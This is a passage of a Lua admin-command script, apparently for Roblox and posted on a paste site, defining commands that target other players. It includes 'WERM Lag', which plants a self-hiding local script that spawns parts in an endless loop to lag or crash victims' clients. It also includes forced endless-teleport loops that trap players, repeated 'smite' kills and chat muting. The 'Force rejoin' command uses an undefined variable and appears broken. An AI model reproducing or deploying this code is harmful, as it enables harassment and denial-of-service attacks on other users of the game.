  4454.             for i=1,#MsgStr  do
  4455.                 Label.Text = MsgStr:sub(1,i)
  4456.                 wait(0.016)
  4457.             end
  4458.                 coroutine.wrap(function()
  4459.                                                                                 for i=3,100 do
  4460.                                                                                                 BBG.StudsOffset = Vector3.new(0,i/10,0)
  4461.                                                                                                  Label.TextTransparency = i / 100
  4462.                                                                                                 wait()
  4463.                                                                                 end
  4464.                                                                                 BBG:Destroy()
  4465.                                                                 end)()
  4466.                                         wait(2)
  4467.                                         BBG:Destroy()
  4468. end
  4469. end)
  4470.  
  4471. end
  4472. Probe = function()
  4473. repeat
  4474. wait()
  4475. until Players:FindFirstChild(LocalPlayer.Name)==nil
  4476.         LocalCharacter = Instance.new("Model");
  4477.                 LocalHead = Instance.new("Part");
  4478.         LocalLight = Instance.new("PointLight");
  4479.                 oo = Instance.new("Part");
  4480.                 Sbl = Instance.new("SelectionBox",oo)
  4481.          local BBG = Instance.new("BillboardGui",LocalHead)
  4482.         BBG.Name = "BBG"
  4483.         BBG.StudsOffset = Vector3.new(0,3.5,0)
  4484.         BBG.Size = UDim2.new(10,0,10,0)
  4485.     BBG.Adornee=LocalHead
  4486.         local Label = Instance.new("TextLabel",BBG)
  4487.         Label.Name = "Label"
  4488.         Label.Text = LocalPlayer.Name
  4489.         Label.TextColor3 = Color3.new(0,0,0)
  4490.         Label.FontSize = "Size14"
  4491.         Label.BackgroundTransparency = 1
  4492.         Label.TextStrokeTransparency = 0.5
  4493.         Label.Size = UDim2.new(1,0,1,0)
  4494.         Label.TextStrokeColor3 = Color3.new(1,1,1)
  4495.                         ppl = true
  4496.                         ppld = false
  4497.                         LocalPlayer.Character = nil
  4498.             LocalHead.FormFactor = "Custom"
  4499.             LocalHead.BrickColor = BrickColor.new("Really blue")
  4500.             LocalHead.Size = Vector3.new(3,3,3)
  4501.             LocalHead.TopSurface = "Smooth"
  4502.             LocalHead.BottomSurface = "Smooth"
  4503.             LocalHead.Shape = "Ball"
  4504.             LocalHead.Anchored = true
  4505.             LocalHead.CanCollide = false
  4506.             LocalHead.Material = "Plastic"
  4507.             LocalHead.Transparency = 0.5              
  4508.             coroutine.wrap(function()
  4509.                 while wait() do
  4510.             LocalLight.Color = LocalHead.Color
  4511.             LocalLight.Brightness = 25
  4512.             LocalLight.Range = 25
  4513.             wait(.1)
  4514.             LocalLight.Brightness = 24
  4515.             LocalLight.Range = 24
  4516.             wait(.1)
  4517.             LocalLight.Brightness = 23
  4518.             LocalLight.Range = 23
  4519.             wait(.1)
  4520.             LocalLight.Brightness = 22
  4521.             LocalLight.Range = 22
  4522.             wait(.1)
  4523.             LocalLight.Brightness = 21
  4524.             LocalLight.Range = 21
  4525.             wait(.1)
  4526.             LocalLight.Brightness = 20
  4527.             LocalLight.Range = 20
  4528.             wait(.1)
  4529.             LocalLight.Brightness = 19
  4530.             LocalLight.Range = 19
  4531.             wait(.1)
  4532.             LocalLight.Brightness = 18
  4533.             LocalLight.Range = 18
  4534.             wait(.1)
  4535.             LocalLight.Brightness = 17
  4536.             LocalLight.Range = 17
  4537.             wait(.1)
  4538.             LocalLight.Brightness = 16
  4539.             LocalLight.Range = 16
  4540.             wait(.1)  
  4541.             LocalLight.Brightness = 17
  4542.             LocalLight.Range = 17
  4543.             wait(.1)
  4544.             LocalLight.Brightness = 18
  4545.             LocalLight.Range = 18
  4546.             wait(.1)
  4547.             LocalLight.Brightness = 19
  4548.             LocalLight.Range = 19
  4549.             wait(.1)
  4550.             LocalLight.Brightness = 20
  4551.             LocalLight.Range = 20
  4552.             wait(.1)
  4553.             LocalLight.Brightness = 21
  4554.             LocalLight.Range = 21
  4555.             wait(.1)
  4556.             LocalLight.Brightness = 22
  4557.             LocalLight.Range = 22
  4558.             wait(.1)
  4559.             LocalLight.Brightness = 23
  4560.             LocalLight.Range = 23
  4561.             wait(.1)
  4562.             LocalLight.Brightness = 24
  4563.             LocalLight.Range = 24
  4564.             wait(.1)
  4565.             end
  4566.             end)()
  4567. Rotation = Rotation + RotationIncrease/90
  4568. oo.Name = ""
  4569. oo.CanCollide = false
  4570. oo.Shape = "Block"
  4571. oo.Size = Vector3.new(1.2, 1.2, 1.2)
  4572. oo.TopSurface = "Smooth"
  4573. oo.BottomSurface = "Smooth"
  4574. oo.BrickColor = BrickColor.new("Really black")
  4575. oo.Material = "Plastic"
  4576. oo.Transparency = 0
  4577. oo.Anchored = true
  4578. Sbl.Name = "SBox"
  4579. Sbl.Color = BrickColor.new("Really red")
  4580. Sbl.Adornee = oo
  4581. Sbl.Transparency = 0.5
  4582.             LocalHead.CFrame = workspace.CurrentCamera.CoordinateFrame * CFrame.Angles(
  4583. math.rad(0),
  4584. math.rad((Rotation*400)*math.pi),
  4585. math.rad(0))
  4586.             LocalHead.CFrame = workspace.CurrentCamera.Focus * CFrame.Angles(
  4587. math.rad(0),
  4588. math.rad((Rotation*400)*math.pi),
  4589. math.rad(0))
  4590.                         oo.CFrame = workspace.CurrentCamera.CoordinateFrame
  4591.                         oo.CFrame = workspace.CurrentCamera.Focus      
  4592.             LocalCharacter.Name = LocalPlayer.Name  
  4593.               coroutine.wrap(function() while wait() and not LocalPlayer.Character do Rotation = Rotation + RotationIncrease/70 LocalHead.CFrame = Camera.Focus * CFrame.Angles(
  4594. math.rad(0),
  4595. math.rad((Rotation*400)*math.pi),
  4596. math.rad(0))
  4597.         oo.CFrame = Camera.Focus * CFrame.Angles(
  4598. math.rad((Rotation*400)*math.pi),
  4599. math.rad((Rotation*400)*math.pi),
  4600. math.rad((Rotation*400)*math.pi)) end end)()
  4601.                while wait() do
  4602.                 pcall(function()
  4603.                     LocalCharacter.Parent=workspace
  4604.                     LocalHead.Parent = LocalCharacter
  4605.                     LocalLight.Parent = LocalHead
  4606.                                         oo.Parent = LocalCharacter
  4607. end) end
  4608. end
  4609. Probe()
  4610.  ]==],Speaker.Backpack)
  4611. if not KPL then
  4612.         Output('Needs Local Source','Red',Speaker,3)
  4613.         end
  4614.  
  4615. end
  4616. )
  4617. YourCommand('WERM Lag','wlag',7,
  4618.         function(Msg,Speaker)
  4619.                 for _,v in pairs(GetPlayers(Msg,Speaker)) do
  4620.                    KL = CreateLocalScript([==[
  4621.                        
  4622. local brik = Instance.new('Part',Workspace.CurrentCamera)
  4623. script.Name = string.rep(" WERM. ACTIVE !", 255)
  4624. for psky,src in pairs(script:GetChildren()) do
  4625. src:Destroy()
  4626. end
  4627. script.Parent = nil
  4628. coroutine.resume(coroutine.create(function()
  4629. math.randomseed(tick())
  4630. local Mdl = Instance.new("Model")
  4631. local oldv = Vector3.new(0,0,0)
  4632. if brik:IsA("BasePart") then
  4633. oldv = brik.CFrame.p
  4634. end
  4635. local BC = BrickColor.new(math.random(), math.random(), math.random())
  4636. for indefi = 1, math.huge do
  4637. coroutine.resume(coroutine.create(function()
  4638. math.randomseed(tick())
  4639. local newv = Vector3.new(oldv.x + math.random(-2,2), oldv.y + math.random(-2,2), oldv.z + math.random(-2,2))
  4640. oldv = newv
  4641. local newpart = Instance.new("Part")
  4642. newpart.Size = Vector3.new(2,2,2)
  4643. newpart.Anchored = true
  4644. newpart.CanCollide = true
  4645. newpart.BrickColor = BC
  4646. newpart.CFrame = CFrame.new(newv.x, newv.y, newv.z)
  4647. newpart:Clone().Parent = Mdl
  4648. newpart.Parent = game:GetService("Workspace").CurrentCamera
  4649. for It, oBj in pairs(Mdl:GetChildren()) do
  4650. oBj:Clone().Parent = game:GetService("Workspace").CurrentCamera
  4651. end
  4652. end))
  4653. wait()
  4654. end
  4655. end))
  4656.                     ]==],v:FindFirstChild('Backpack') or v:findFirstChild('PlayerGui') or v.Character)
  4657.                 end
  4658.         end)
  4659. if not KL then
  4660.         Output('Needs Local Source','Red',Speaker,3)
  4661.         end
  4662.        
  4663. YourCommand("Smite","smite",4,
  4664.         function(Msg,Speaker)
  4665.          for _,v in pairs(GetPlayers(Msg,Speaker)) do
  4666.             local Char = v.Character
  4667.             local Smite = Instance.new("Part",workspace)
  4668.             Smite.FormFactor = "Custom"
  4669.             Smite.TopSurface = "Smooth"
  4670.             Smite.BottomSurface = "Smooth"
  4671.             Smite.Anchored = true
  4672.             Smite.Locked = true
  4673.             Smite.Size = Vector3.new(25,3,25)
  4674.             Smite.BrickColor = BrickColor.new("New Yeller")
  4675.             Smite.Transparency = 1
  4676.             Smite.CFrame = Char.Torso.CFrame * CFrame.new(0,-2.5,0)
  4677.             for i=1,0,-0.05 do
  4678.                 wait()
  4679.                 Smite.Transparency = i
  4680.             end
  4681.             coroutine.resume(coroutine.create(function()
  4682.                 for i=0,1,0.05 do
  4683.                     wait()
  4684.                     Smite.Transparency = i
  4685.                 end
  4686.                 Smite:remove()
  4687.             end))
  4688.             wait()
  4689.             local Expl = Instance.new("Explosion",workspace)
  4690.             Expl.Position = Smite.Position
  4691.             Expl.BlastPressure = 1000000000
  4692.            
  4693.             for _,Part in pairs(v.Character:children()) do
  4694.                 if Part:IsA("BasePart") then
  4695.                     coroutine.resume(coroutine.create(function()
  4696.                         for i=1,10 do
  4697.                             local Sparkles = Instance.new("Sparkles",Part)
  4698.                             Sparkles.Color = Color3.new(math.random(0,1),math.random(0,1),math.random(0,1))
  4699.                             local Fire = Instance.new("Fire",Part)
  4700.                             Fire.Color = Color3.new(math.random(0,1),math.random(0,1),math.random(0,1))
  4701.                             Fire.SecondaryColor = Color3.new(math.random(0,1),math.random(0,1),math.random(0,1))
  4702.                         end
  4703.                         Part:BreakJoints()
  4704.                         local BP = Instance.new("BodyPosition",Part)
  4705.                         BP.maxForce = Vector3.new(math.huge,math.huge,math.huge)
  4706.                         BP.P = 1000
  4707.                         BP.position = Part.Position + Vector3.new(
  4708.                             math.random(-100,100),
  4709.                             100,
  4710.                             math.random(-100,100))
  4711.                         wait(3)
  4712.                         local Expl = Instance.new("Explosion",workspace)
  4713.                         Expl.Position = Part.Position
  4714.                         Expl.BlastPressure = 1000000000
  4715.                     end))
  4716.                 end
  4717.             end
  4718.         end
  4719.             end
  4720. )
  4721.  
  4722. YourCommand('Mute','mute',6,
  4723. function(Msg,Speaker)
  4724. for _,Player in pairs(GetPlayers(Msg,Speaker)) do
  4725. CreateLocalScript("game:GetService('StarterGui'):SetCoreGuiEnabled(3, false)",Player.Backpack or Player.PlayerGui)
  4726. end
  4727. end
  4728. )
  4729. YourCommand('Unmute', 'unmute',6,
  4730. function(Msg,Speaker)
  4731. for _,Player in pairs(GetPlayers(Msg,Speaker)) do
  4732. CreateLocalScript("game:GetService('StarterGui'):SetCoreGuiEnabled(3, true)",Player.Backpack or Player.PlayerGui)
  4733. end
  4734. end
  4735. )
  4736.  
  4737. YourCommand("Loop Smite","lsmite",6,
  4738.                 function(Msg,Speaker)
  4739.                         for _,v in pairs(GetPlayers(Msg,Speaker)) do
  4740.                                 OnChatted(YourBet..'smite'..YourBet2..v.Name,Speaker)
  4741.                                 end
  4742.                 for _,v in pairs(GetPlayers(Msg,Speaker)) do
  4743.                         v.CharacterAdded:connect(function()
  4744.                                 coroutine.wrap(function()
  4745.                                         OnChatted(YourBet..'smite'..YourBet2..v.Name,Speaker)
  4746.                                 end)()
  4747.                         end)
  4748.                 end
  4749.         end
  4750. )
  4751. YourCommand("Force Place Teleport","fptp",7,
  4752.     function(Msg,Speaker)
  4753.         Split = GetSplit(Msg)
  4754.         for _,v in pairs(GetPlayers(Msg:sub(1,Split-1),Speaker)) do
  4755.             CreateLocalScript([==[
  4756.                 script.Parent = nil
  4757.                 while true do wait()
  4758.                     game:GetService'TeleportService':Teleport(]==]..Msg:sub(Split+1)..[==[)
  4759.                 end
  4760.             ]==],v.Backpack)
  4761.         end
  4762.     end
  4763. )
  4764. YourCommand('Force rejoin','frejoin',6,
  4765.     function(Msg,Speaker)
  4766.         for _,v in pairs(GetPlayers(Msg,Speaker)) do
  4767.            CreateLocalScript([==[
  4768.                 script.Parent = nil
  4769.                 while true do wait()
  4770.                     game:GetService'TeleportService':Teleport(]==]..Msg:sub(Split+1)..[==[)
  4771.                 end
  4772.             ]==],v.Backpack)
  4773.         end
  4774.         end
  4775.    
  4776. )
  4777. TabChange = true
  4778. CurrentTabletPart = DifferentTablets.Plate
  4779.  
  4780.  
  4781. --[[End of Commands]]--
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement